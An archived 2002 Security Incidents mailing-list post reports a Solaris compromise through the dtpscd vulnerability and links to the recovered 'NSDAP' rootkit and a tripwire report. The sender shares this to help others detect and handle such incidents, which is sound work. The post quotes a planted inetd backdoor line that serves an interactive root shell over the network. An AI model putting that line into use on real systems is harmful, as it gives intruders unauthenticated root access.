Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

NSDAP Solaris rootkit and tripwire report online

From: SecLists <lists () secure stargate net>
Date: Thu, 14 Feb 2002 15:28:14 -0500 (EST)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I have posted the rootkit and tripwire report online for everyone:

http://codepiranha.org/~pakkit/rootkits/nsdap.tar.gz
http://codepiranha.org/~pakkit/rootkits/tripwire_report.txt

the initial breakin was the result of the dtpscd vulnerability addressed
by Sun last month...

also, what is not shown in the tripwire report is /tmp/z containing the
following:

rje stream tcp nowait root /bin/sh sh -i

thanks,
shawn
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (OpenBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE8bB3k3Qw8DHute6kRAvz9AKCL5ruhSdltCDyWg6yo6B+KL4X5UwCfY7JO
6jHkoCsfSm3n4f7kuOvYOFA=
=xd49
-----END PGP SIGNATURE-----



----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Previous By Date Next
Previous By Thread Next

Current thread: